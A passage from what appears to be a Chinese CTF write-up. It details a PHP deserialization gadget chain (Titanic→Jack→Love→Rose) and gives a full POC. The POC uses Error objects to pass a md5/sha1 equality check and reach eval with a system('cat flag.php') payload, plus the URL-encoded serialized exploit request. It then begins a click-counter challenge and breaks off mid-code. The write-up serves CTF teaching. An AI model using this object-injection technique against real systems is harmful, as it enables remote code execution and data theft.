<p>然后便是去找能够触发 Love 类中 <code>__call</code> 方法的地方，看到了 Jack 类的 <code>__set</code> 方法中的 <code>$b-&gt;$a();</code> 我们可以将这里的 <code>$b</code> 赋为 <code>Love</code> 类的一个对象，这样便可以触发 <code>Love</code> 类中的 <code>__call</code> 了。Titanic 类中的 <code>$this-&gt;people-&gt;action=$this-&gt;ship;</code> 可以触发 Jack 类的 <code>__set</code> 方法。</p>
<h3 id="h3-poc"><a name="POC" class="reference-link"></a><span class="header-link octicon octicon-link"></span>POC</h3><p>所以最终的 POC 如下：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pln">PHP</span></code></li><li class="L1"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L2"><code class="lang-php"></code></li><li class="L3"><code class="lang-php"><span class="kwd">class</span><span class="pln"> </span><span class="typ">Jack</span></code></li><li class="L4"><code class="lang-php"><span class="pun">{</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    </span><span class="kwd">private</span><span class="pln"> $action</span><span class="pun">;</span></code></li><li class="L6"><code class="lang-php"><span class="pln">    </span><span class="kwd">function</span><span class="pln"> __set</span><span class="pun">(</span><span class="pln">$a</span><span class="pun">,</span><span class="pln"> $b</span><span class="pun">)</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    </span><span class="pun">{</span></code></li><li class="L8"><code class="lang-php"><span class="pln">        $b</span><span class="pun">-&gt;</span><span class="pln">$a</span><span class="pun">();</span></code></li><li class="L9"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L0"><code class="lang-php"><span class="pun">}</span></code></li><li class="L1"><code class="lang-php"><span class="kwd">class</span><span class="pln"> </span><span class="typ">Love</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    </span><span class="kwd">public</span><span class="pln"> $var</span><span class="pun">;</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    </span><span class="kwd">function</span><span class="pln"> __call</span><span class="pun">(</span><span class="pln">$a</span><span class="pun">,</span><span class="pln">$b</span><span class="pun">)</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="pun">{</span></code></li><li class="L5"><code class="lang-php"><span class="pln">        $rose </span><span class="pun">=</span><span class="pln"> $this</span><span class="pun">-&gt;</span><span class="kwd">var</span><span class="pun">;</span></code></li><li class="L6"><code class="lang-php"><span class="pln">        call_user_func</span><span class="pun">(</span><span class="pln">$rose</span><span class="pun">);</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L8"><code class="lang-php"><span class="pln">    </span><span class="kwd">private</span><span class="pln"> </span><span class="kwd">function</span><span class="pln"> action</span><span class="pun">(){</span></code></li><li class="L9"><code class="lang-php"><span class="pln">        echo </span><span class="str">"jack love rose"</span><span class="pun">;</span></code></li><li class="L0"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L1"><code class="lang-php"><span class="pun">}</span></code></li><li class="L2"><code class="lang-php"><span class="kwd">class</span><span class="pln"> </span><span class="typ">Titanic</span><span class="pun">{</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    </span><span class="kwd">public</span><span class="pln"> $people</span><span class="pun">;</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="kwd">public</span><span class="pln"> $ship</span><span class="pun">;</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    </span><span class="kwd">function</span><span class="pln"> __destruct</span><span class="pun">(){</span></code></li><li class="L6"><code class="lang-php"><span class="pln">        $this</span><span class="pun">-&gt;</span><span class="pln">people</span><span class="pun">-&gt;</span><span class="pln">action</span><span class="pun">=</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">ship</span><span class="pun">;</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L8"><code class="lang-php"><span class="pun">}</span></code></li><li class="L9"><code class="lang-php"><span class="kwd">class</span><span class="pln"> </span><span class="typ">Rose</span><span class="pun">{</span></code></li><li class="L0"><code class="lang-php"><span class="pln">    </span><span class="kwd">public</span><span class="pln"> $var1</span><span class="pun">;</span></code></li><li class="L1"><code class="lang-php"><span class="pln">    </span><span class="kwd">public</span><span class="pln"> $var2</span><span class="pun">;</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    </span><span class="kwd">function</span><span class="pln"> __invoke</span><span class="pun">(){</span></code></li><li class="L3"><code class="lang-php"><span class="pln">        var_dump</span><span class="pun">(</span><span class="pln">sha1</span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var1</span><span class="pun">));</span></code></li><li class="L4"><code class="lang-php"><span class="pln">        var_dump</span><span class="pun">(</span><span class="pln">sha1</span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var2</span><span class="pun">));</span></code></li><li class="L5"><code class="lang-php"><span class="pln">        </span><span class="kwd">if</span><span class="pun">(</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var1 </span><span class="pun">!=</span><span class="pln"> $this</span><span class="pun">-&gt;</span><span class="pln">var2</span><span class="pun">)</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> </span><span class="pun">(</span><span class="pln">md5</span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var1</span><span class="pun">)</span><span class="pln"> </span><span class="pun">===</span><span class="pln"> md5</span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var2</span><span class="pun">))</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> </span><span class="pun">(</span><span class="pln">sha1</span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var1</span><span class="pun">)===</span><span class="pln"> sha1</span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var2</span><span class="pun">))</span><span class="pln"> </span><span class="pun">){</span></code></li><li class="L6"><code class="lang-php"><span class="pln">            </span><span class="kwd">eval</span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var1</span><span class="pun">);</span></code></li><li class="L7"><code class="lang-php"><span class="pln">        </span><span class="pun">}</span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L8"><code class="lang-php"><span class="pln">            echo </span><span class="str">'nonono'</span><span class="pun">;</span></code></li><li class="L9"><code class="lang-php"><span class="pln">        </span><span class="pun">}</span></code></li><li class="L0"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L1"><code class="lang-php"><span class="pun">}</span></code></li><li class="L2"><code class="lang-php"><span class="pln">$poc </span><span class="pun">=</span><span class="pln"> </span><span class="kwd">new</span><span class="pln"> </span><span class="typ">Titanic</span><span class="pun">();</span></code></li><li class="L3"><code class="lang-php"><span class="pln">$poc </span><span class="pun">-&gt;</span><span class="pln"> people </span><span class="pun">=</span><span class="pln"> </span><span class="kwd">new</span><span class="pln"> </span><span class="typ">Jack</span><span class="pun">();</span></code></li><li class="L4"><code class="lang-php"><span class="pln">$poc </span><span class="pun">-&gt;</span><span class="pln"> ship </span><span class="pun">=</span><span class="pln"> </span><span class="kwd">new</span><span class="pln"> </span><span class="typ">Love</span><span class="pun">();</span></code></li><li class="L5"><code class="lang-php"></code></li><li class="L6"><code class="lang-php"><span class="pln">$payload </span><span class="pun">=</span><span class="pln"> </span><span class="str">"?&gt;&lt;?=system('cat flag.php')?&gt;"</span><span class="pun">;</span></code></li><li class="L7"><code class="lang-php"><span class="pln">$a</span><span class="pun">=</span><span class="kwd">new</span><span class="pln"> </span><span class="typ">Error</span><span class="pun">(</span><span class="pln">$payload</span><span class="pun">,</span><span class="lit">1</span><span class="pun">);</span><span class="pln">$b</span><span class="pun">=</span><span class="kwd">new</span><span class="pln"> </span><span class="typ">Error</span><span class="pun">(</span><span class="pln">$payload</span><span class="pun">,</span><span class="lit">2</span><span class="pun">);</span></code></li><li class="L8"><code class="lang-php"><span class="pln">$eval </span><span class="pun">=</span><span class="pln"> </span><span class="kwd">new</span><span class="pln"> </span><span class="typ">Rose</span><span class="pun">();</span></code></li><li class="L9"><code class="lang-php"><span class="pln">$eval </span><span class="pun">-&gt;</span><span class="pln"> var1 </span><span class="pun">=</span><span class="pln"> $a</span><span class="pun">;</span></code></li><li class="L0"><code class="lang-php"><span class="pln">$eval </span><span class="pun">-&gt;</span><span class="pln"> var2 </span><span class="pun">=</span><span class="pln"> $b</span><span class="pun">;</span></code></li><li class="L1"><code class="lang-php"></code></li><li class="L2"><code class="lang-php"><span class="pln">$poc </span><span class="pun">-&gt;</span><span class="pln"> ship </span><span class="pun">-&gt;</span><span class="pln"> </span><span class="kwd">var</span><span class="pln"> </span><span class="pun">=</span><span class="pln"> $eval</span><span class="pun">;</span></code></li><li class="L3"><code class="lang-php"><span class="pln">echo urlencode</span><span class="pun">(</span><span class="pln">serialize</span><span class="pun">(</span><span class="pln">$poc</span><span class="pun">)).</span><span class="str">"\n"</span><span class="pun">;</span></code></li><li class="L4"><code class="lang-php"></code></li><li class="L5"><code class="lang-php"><span class="com">// 输出: O%3A7%3A%22Titanic%22%3A2%3A%7Bs%3A6%3A%22people%22%3BO%3A4%3A%22Jack%22%3A1%3A%7Bs%3A12%3A%22%00Jack%00action%22%3BN%3B%7Ds%3A4%3A%22ship%22%3BO%3A4%3A%22Love%22%3A1%3A%7Bs%3A3%3A%22var%22%3BO%3A4%3A%22Rose%22%3A2%3A%7Bs%3A4%3A%22var1%22%3BO%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A29%3A%22%3F%3E%3C%3F%3Dsystem%28%27cat+flag.php%27%29%3F%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A1%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A29%3A%22C%3A%5CphpStudy%5CWWW%5Cwww%5Cindex.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A53%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7Ds%3A4%3A%22var2%22%3BO%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A29%3A%22%3F%3E%3C%3F%3Dsystem%28%27cat+flag.php%27%29%3F%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A2%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A29%3A%22C%3A%5CphpStudy%5CWWW%5Cwww%5Cindex.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A53%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7D%7D%7D%7D</span></code></li></ol></pre>
<h3 id="h3-payload-"><a name="payload:" class="reference-link"></a><span class="header-link octicon octicon-link"></span>payload:</h3><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">?</span><span class="pln">love</span><span class="pun">=</span><span class="pln">O</span><span class="pun">%</span><span class="lit">3A7</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22Titanic</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3A2</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">7Bs</span><span class="pun">%</span><span class="lit">3A6</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22people</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3BO</span><span class="pun">%</span><span class="lit">3A4</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22Jack</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3A1</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">7Bs</span><span class="pun">%</span><span class="lit">3A12</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">00Jack</span><span class="pun">%</span><span class="lit">00action</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3BN</span><span class="pun">%</span><span class="lit">3B</span><span class="pun">%</span><span class="lit">7Ds</span><span class="pun">%</span><span class="lit">3A4</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22ship</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3BO</span><span class="pun">%</span><span class="lit">3A4</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22Love</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3A1</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">7Bs</span><span class="pun">%</span><span class="lit">3A3</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22var</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3BO</span><span class="pun">%</span><span class="lit">3A4</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22Rose</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3A2</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">7Bs</span><span class="pun">%</span><span class="lit">3A4</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22var1</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3BO</span><span class="pun">%</span><span class="lit">3A5</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22Error</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3A7</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">7Bs</span><span class="pun">%</span><span class="lit">3A10</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">00</span><span class="pun">%</span><span class="lit">2A</span><span class="pun">%</span><span class="lit">00message</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3Bs</span><span class="pun">%</span><span class="lit">3A29</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3F</span><span class="pun">%</span><span class="lit">3E</span><span class="pun">%</span><span class="lit">3C</span><span class="pun">%</span><span class="lit">3F</span><span class="pun">%</span><span class="lit">3Dsystem</span><span class="pun">%</span><span class="lit">28</span><span class="pun">%</span><span class="lit">27cat</span><span class="pun">+</span><span class="pln">flag</span><span class="pun">.</span><span class="pln">php</span><span class="pun">%</span><span class="lit">27</span><span class="pun">%</span><span class="lit">29</span><span class="pun">%</span><span class="lit">3F</span><span class="pun">%</span><span class="lit">3E</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3Bs</span><span class="pun">%</span><span class="lit">3A13</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">00Error</span><span class="pun">%</span><span class="lit">00string</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3Bs</span><span class="pun">%</span><span class="lit">3A0</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3Bs</span><span class="pun">%</span><span class="lit">3A7</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">00</span><span class="pun">%</span><span class="lit">2A</span><span class="pun">%</span><span class="lit">00code</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3Bi</span><span class="pun">%</span><span class="lit">3A1</span><span class="pun">%</span><span class="lit">3Bs</span><span class="pun">%</span><span class="lit">3A7</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">00</span><span class="pun">%</span><span class="lit">2A</span><span class="pun">%</span><span class="lit">00file</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3Bs</span><span class="pun">%</span><span class="lit">3A29</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22C</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">5CphpStudy</span><span class="pun">%</span><span class="lit">5CWWW</span><span class="pun">%</span><span class="lit">5Cwww</span><span class="pun">%</span><span class="lit">5Cindex</span><span class="pun">.</span><span class="pln">php</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3Bs</span><span class="pun">%</span><span class="lit">3A7</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">00</span><span class="pun">%</span><span class="lit">2A</span><span class="pun">%</span><span class="lit">00line</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3Bi</span><span class="pun">%</span><span class="lit">3A53</span><span class="pun">%</span><span class="lit">3Bs</span><span class="pun">%</span><span class="lit">3A12</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">00Error</span><span class="pun">%</span><span class="lit">00trace</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3Ba</span><span class="pun">%</span><span class="lit">3A0</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">7B</span><span class="pun">%</span><span class="lit">7Ds</span><span class="pun">%</span><span class="lit">3A15</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">00Error</span><span class="pun">%</span><span class="lit">00previous</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3BN</span><span class="pun">%</span><span class="lit">3B</span><span class="pun">%</span><span class="lit">7Ds</span><span class="pun">%</span><span class="lit">3A4</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22var2</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3BO</span><span class="pun">%</span><span class="lit">3A5</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22Error</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3A7</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">7Bs</span><span class="pun">%</span><span class="lit">3A10</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">00</span><span class="pun">%</span><span class="lit">2A</span><span class="pun">%</span><span class="lit">00message</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3Bs</span><span class="pun">%</span><span class="lit">3A29</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3F</span><span class="pun">%</span><span class="lit">3E</span><span class="pun">%</span><span class="lit">3C</span><span class="pun">%</span><span class="lit">3F</span><span class="pun">%</span><span class="lit">3Dsystem</span><span class="pun">%</span><span class="lit">28</span><span class="pun">%</span><span class="lit">27cat</span><span class="pun">+</span><span class="pln">flag</span><span class="pun">.</span><span class="pln">php</span><span class="pun">%</span><span class="lit">27</span><span class="pun">%</span><span class="lit">29</span><span class="pun">%</span><span class="lit">3F</span><span class="pun">%</span><span class="lit">3E</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3Bs</span><span class="pun">%</span><span class="lit">3A13</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">00Error</span><span class="pun">%</span><span class="lit">00string</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3Bs</span><span class="pun">%</span><span class="lit">3A0</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3Bs</span><span class="pun">%</span><span class="lit">3A7</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">00</span><span class="pun">%</span><span class="lit">2A</span><span class="pun">%</span><span class="lit">00code</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3Bi</span><span class="pun">%</span><span class="lit">3A2</span><span class="pun">%</span><span class="lit">3Bs</span><span class="pun">%</span><span class="lit">3A7</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">00</span><span class="pun">%</span><span class="lit">2A</span><span class="pun">%</span><span class="lit">00file</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3Bs</span><span class="pun">%</span><span class="lit">3A29</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22C</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">5CphpStudy</span><span class="pun">%</span><span class="lit">5CWWW</span><span class="pun">%</span><span class="lit">5Cwww</span><span class="pun">%</span><span class="lit">5Cindex</span><span class="pun">.</span><span class="pln">php</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3Bs</span><span class="pun">%</span><span class="lit">3A7</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">00</span><span class="pun">%</span><span class="lit">2A</span><span class="pun">%</span><span class="lit">00line</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3Bi</span><span class="pun">%</span><span class="lit">3A53</span><span class="pun">%</span><span class="lit">3Bs</span><span class="pun">%</span><span class="lit">3A12</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">00Error</span><span class="pun">%</span><span class="lit">00trace</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3Ba</span><span class="pun">%</span><span class="lit">3A0</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">7B</span><span class="pun">%</span><span class="lit">7Ds</span><span class="pun">%</span><span class="lit">3A15</span><span class="pun">%</span><span class="lit">3A</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">00Error</span><span class="pun">%</span><span class="lit">00previous</span><span class="pun">%</span><span class="lit">22</span><span class="pun">%</span><span class="lit">3BN</span><span class="pun">%</span><span class="lit">3B</span><span class="pun">%</span><span class="lit">7D</span><span class="pun">%</span><span class="lit">7D</span><span class="pun">%</span><span class="lit">7D</span><span class="pun">%</span><span class="lit">7D</span></code></li></ol></pre><p><a href="https://whoamianony.oss-cn-beijing.aliyuncs.com/img/20210604192348.png"><img src="https://whoamianony.oss-cn-beijing.aliyuncs.com/img/20210604192348.png" alt="image-20210604184544387"></a></p>
<h2 id="h2-ctf-110"><a name="CTF-110" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-110</h2><h3 id="h3-u6E90u7801"><a name="源码" class="reference-link"></a><span class="header-link octicon octicon-link"></span>源码</h3><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-html"><span class="tag">&lt;meta</span><span class="pln"> </span><span class="atn">charset</span><span class="pun">=</span><span class="atv">"utf-8"</span><span class="pln"> </span><span class="tag">/&gt;</span></code></li><li class="L1"><code class="lang-html"><span class="tag">&lt;h2&gt;</span><span class="pln">拼手速的时候到了，冲鸭！！！</span><span class="tag">&lt;h2/&gt;</span></code></li><li class="L2"><code class="lang-html"><span class="tag">&lt;script&gt;</span><span class="pln">alert</span><span class="pun">(</span><span class="str">'点击满1000w下就可以获得flag'</span><span class="pun">)</span><span class="tag">&lt;/script&gt;</span></code></li><li class="L3"><code class="lang-html"><span class="tag">&lt;html&gt;</span></code></li><li class="L4"><code class="lang-html"><span class="tag">&lt;title&gt;</span><span class="pln">手速小游戏</span><span class="tag">&lt;/title&gt;</span></code></li><li class="L5"><code class="lang-html"><span class="tag">&lt;head&gt;</span></code></li><li class="L6"><code class="lang-html"><span class="tag">&lt;SCRIPT</span><span class="pln"> </span><span class="atn">type</span><span class="pun">=</span><span class="atv">"text/javascript"</span><span class="pln"> </span><span class="atn">src</span><span class="pun">=</span><span class="atv">"http://localhost/iuuiiuqiweuiqwueiqiuweuqwieuuniuqwehiuqwhieu"</span><span class="tag">&gt;&lt;/SCRIPT&gt;</span></code></li><li class="L7"><code class="lang-html"><span class="tag">&lt;SCRIPT</span><span class="pln"> </span><span class="atn">type</span><span class="pun">=</span><span class="atv">"text/javascript"</span><span class="tag">&gt;</span></code></li><li class="L8"><code class="lang-html"><span class="kwd">var</span><span class="pln"> maxtime </span><span class="pun">=</span><span class="pln"> </span><span class="lit">30</span><span class="pln"> </span><span class="pun">*</span><span class="pln"> </span><span class="lit">60</span><span class="pun">;</span><span class="pln"> </span><span class="com">//一个小时，按秒计算，自己调整!   </span></code></li><li class="L9"><code class="lang-html"><span class="kwd">function</span><span class="pln"> </span><span class="typ">CountDown</span><span class="pun">()</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L0"><code class="lang-html"><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">maxtime </span><span class="pun">&gt;=</span><span class="pln"> </span><span class="lit">0</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L1"><code class="lang-html"><span class="pln">        minutes </span><span class="pun">=</span><span class="pln"> </span><span class="typ">Math</span><span class="pun">.</span><span class="pln">floor</span><span class="pun">(</span><span class="pln">maxtime </span><span class="pun">/</span><span class="pln"> </span><span class="lit">60</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-html"><span class="pln">        seconds </span><span class="pun">=</span><span class="pln"> </span><span class="typ">Math</span><span class="pun">.</span><span class="pln">floor</span><span class="pun">(</span><span class="pln">maxtime </span><span class="pun">%</span><span class="pln"> </span><span class="lit">60</span><span class="pun">);</span></code></li><li class="L3"><code class="lang-html"><span class="pln">        msg </span><span class="pun">=</span><span class="pln"> </span><span class="str">"距离页面刷新还有"</span><span class="pln"> </span><span class="pun">+</span><span class="pln"> minutes </span><span class="pun">+</span><span class="pln"> </span><span class="str">"分"</span><span class="pln"> </span><span class="pun">+</span><span class="pln"> seconds </span><span class="pun">+</span><span class="pln"> </span><span class="str">"秒"</span><span class="pun">;</span></code></li><li class="L4"><code class="lang-html"><span class="pln">        document</span><span class="pun">.</span><span class="pln">all</span><span class="pun">[</span><span class="str">"timer"</span><span class="pun">].</span><span class="pln">innerHTML </span><span class="pun">=</span><span class="pln"> msg</span><span class="pun">;</span></code></li><li class="L5"><code class="lang-html"><span class="pln">        </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">maxtime </span><span class="pun">==</span><span class="pln"> </span><span class="lit">5</span><span class="pln"> </span><span class="pun">*</span><span class="pln"> </span><span class="lit">60</span><span class="pun">)</span><span class="pln">alert</span><span class="pun">(</span><span class="str">"还剩5分钟"</span><span class="pun">);</span></code></li><li class="L6"><code class="lang-html"><span class="pln">         </span><span class="pun">--</span><span class="pln">maxtime</span><span class="pun">;</span></code></li><li class="L7"><code class="lang-html"><span class="pln">    </span><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L8"><code class="lang-html"><span class="pln">        clearInterval</span><span class="pun">(</span><span class="pln">timer</span><span class="pun">);</span></code></li><li class="L9"><code class="lang-html"><span class="pln">        location</span><span class="pun">.</span><span class="pln">reload</span><span class="pun">();</span></code></li><li class="L0"><code class="lang-html"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L1"><code class="lang-html"><span class="pun">}</span></code></li><li class="L2"><code class="lang-html"><span class="pln">timer </span><span class="pun">=</span><span class="pln"> setInterval</span><span class="pun">(</span><span class="str">"CountDown()"</span><span class="pun">,</span><span class="pln"> </span><span class="lit">1000</span><span class="pun">);</span><span class="pln">  </span></code></li><li class="L3"><code class="lang-html"></code></li><li class="L4"><code class="lang-html"><span class="kwd">var</span><span class="pln"> x</span><span class="pun">=</span><span class="lit">0</span><span class="pun">;</span></code></li><li class="L5"><code class="lang-html"><span class="kwd">function</span><span class="pln"> CS</span><span class="pun">()</span></code></li><li class="L6"><code class="lang-html"><span class="pun">{</span></code></li><li class="L7"><code class="lang-html"><span class="pln">    x</span><span class="pun">+=</span><span class="lit">1</span><span class="pun">;</span></code></li><li class="L8"><code class="lang-html"></code></li><li class="L9"><code class="lang-html"><span class="pln">    div</span><span class="pun">.</span><span class="pln">innerText</span><span class="pun">=</span><span class="pln">x</span><span class="pun">;</span></code></li><li class="L0"><code class="lang-html"><span class="pln">    </span><span class="kwd">if</span><span class="pun">(</span><span class="pln">x </span><span class="pun">&gt;=</span><span class="pln"> </span><span class="lit">10000000</span><span class="pun">)</span></code></li><li class="L1"><code class="lang-html"><span class="pln">    </span><span class="pun">{</span></code></li><li class="L2"><code class="lang-html"><span class="pln">        alert</span><span class="pun">(</span><span class="pln">flag</span><span class="pun">);</span></code></li><li class="L3"><code class="lang-html"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L4"><code class="lang-html"><span class="pun">}</span><span class="pln">          </span></code></li><li class="L5"><code class="lang-html"><span class="tag">&lt;/SCRIPT&gt;</span></code></li><li class="L6"><code class="lang-html"><span class="tag">&lt;/head&gt;</span></code></li><li class="L7"><code class="lang-html"><span 